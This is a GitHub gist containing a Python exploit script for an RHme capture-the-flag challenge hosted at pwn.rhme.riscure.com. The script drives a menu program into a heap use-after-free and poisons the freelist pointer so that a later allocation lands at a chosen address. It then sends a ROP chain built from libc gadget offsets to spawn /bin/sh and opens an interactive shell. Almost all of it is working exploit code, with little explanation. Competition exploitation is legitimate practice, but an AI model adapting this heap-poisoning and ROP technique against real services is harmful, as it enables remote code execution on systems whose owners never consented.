Skip to content

Instantly share code, notes, and snippets.

@deanjerkovich
Created August 29, 2017 01:10
Show Gist options
  • Save deanjerkovich/118d3a69467c11cb9b594373f7674bbc to your computer and use it in GitHub Desktop.
Save deanjerkovich/118d3a69467c11cb9b594373f7674bbc to your computer and use it in GitHub Desktop.
#!/usr/bin/env python
import socket
import time
import telnetlib
import struct
LIBC_BASE = 0x7eff13bcb000
HEAP_BASE = 0x248b000
SLEEP_TIME = 1
t = telnetlib.Telnet()
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("pwn.rhme.riscure.com",1337))
#s.connect(("127.0.0.1",1337))
def doRecv():
print "<< ", s.recv(1024)
time.sleep(SLEEP_TIME)
def doSend(data):
print ">> ", data
s.send(data + "\n")
time.sleep(SLEEP_TIME)
doRecv()
blahfuck = raw_input('attach debugger and press enter..')
doRecv()
doSend("1") # add our fake chunk player
doSend("fake")
doSend("33")
doSend("0")
doSend("33")
doSend("0")
doSend("1")
doSend("hax") # add a player
doSend("1")
doSend("1")
doSend("1")
doSend("1")
doSend("3") # get a pointer to it
doSend("1")
doSend("2") # free underlying data
doSend("1")
doSend("4")
doSend("1")
# the below is a heap offset | this is 0x1620 offset from heap base.
# heap base == 0x1a34000
# offset: 0x1620
# == 0x1a35620
doSend(struct.pack('<L', HEAP_BASE + 0x1620)) # modify the freelist FD pointer to point at our fake chunk
doSend("0")
doSend("1")
doSend("A"*128) # alloc a new player with a non-fastbin name to get uneven freelist
doSend("3") # so our poisoned malloc is in response to the Name malloc
doSend("3")
doSend("3")
doSend("3")
doSend("1")
doSend("\x40\x30\x60") # the malloc for this request will be serviced using our poisoned freelist, so will
doSend("4") # return a pointer of our choosing. subsequent writes will be to a destination of
doSend("4") # of our choosing
doSend("4")
doSend("4")
doSend("3")
doSend("0")
doSend("4")
doSend("1")
doSend(struct.pack('<Q', LIBC_BASE + 0x101f80))
doSend("1")
g1 = struct.pack('<Q', LIBC_BASE + 0x34a70)
g2 = struct.pack('<Q', LIBC_BASE + 0x1fb78)
g3 = struct.pack('<Q', LIBC_BASE + 0xcd0f3)
s.send(g1+g2+"\x00\x00\x00\x00\x00\x00\x00\x00" + g3 + "HXHXHXHXHXHXHXHXHXHXH\n")
t.sock = s
t.interact()
# /bin/sh 0x7f50304e40f3 this is the one requiring RCX and R12 null | libc offset 0xcd0f3
# /bin/sh 0x7f503050d6c0
# 0x7f5030436b7b 0x1fb7b xor eax eax, ret
# 0x7f503044ba70 0x34a70 xor ecx, ecx, .... ret
# 0x7f5030436b78 0x1fb78 pop r12, ret
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment